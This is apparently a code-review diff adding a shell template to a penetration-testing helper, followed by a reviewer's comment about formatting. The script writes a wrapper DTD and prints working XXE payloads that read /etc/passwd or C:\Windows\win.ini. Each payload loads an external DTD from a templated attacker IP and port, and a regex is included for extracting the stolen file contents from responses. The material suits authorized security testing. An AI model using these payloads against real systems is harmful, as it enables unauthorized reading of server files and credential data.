src/profi/templates/scripts/deliver-xxe-cdata-wrapper-dtd

```diff
@@ -0,0 +1,30 @@
+mkdir -p packstation/outbound; \
+echo '<!ENTITY wrapper "%start;%file;%end;">' > packstation/outbound/wrapper.dtd; \
+echo '================================================================'; \
+echo '                      -----Linux-----                      '; \
+echo 'Suggested payload for reading /etc/passwd'; \
+echo '<!DOCTYPE data ['; \
+echo '<!ENTITY % start "<![CDATA[DELIMITER_BEFORE_FILE">'; \
+echo '<!ENTITY % file SYSTEM "file:///etc/passwd" >'; \
+echo '<!ENTITY % end "DELIMITER_AFTER_FILE]]>">'; \
+echo '<!ENTITY % dtd SYSTEM "<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/wrapper.dtd">'; \
+echo '%dtd;'; \
+echo ']>'; \
+echo '================================================================'; \
+echo '                      -----Windows-----                      '; \
+echo 'Suggested payload for reading C:\Windows\win.ini'; \
+echo '<!DOCTYPE data ['; \
+echo '<!ENTITY % start "<![CDATA[DELIMITER_BEFORE_FILE">'; \
+echo '<!ENTITY % file SYSTEM "file://C:\Windows\win.ini" >'; \
+echo '<!ENTITY % end "DELIMITER_AFTER_FILE]]>">'; \
+echo '<!ENTITY % dtd SYSTEM "<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/wrapper.dtd">'; \
+echo '%dtd;'; \
+echo ']>'; \
+echo '================================================================'; \
+echo '                      ------RegEx------                      '; \
+echo 'To filter out file contents in the response:'; \
+echo 'DELIMITER_BEFORE_FILE(.*?)DELIMITER_AFTER_FILE'; \
+echo 'Directly in python:'; \
```

Comment:
I think a newline between the regex and the instruction would benefit the separation. Other than that, I think the python suggestion is fine as the regex itself is also shown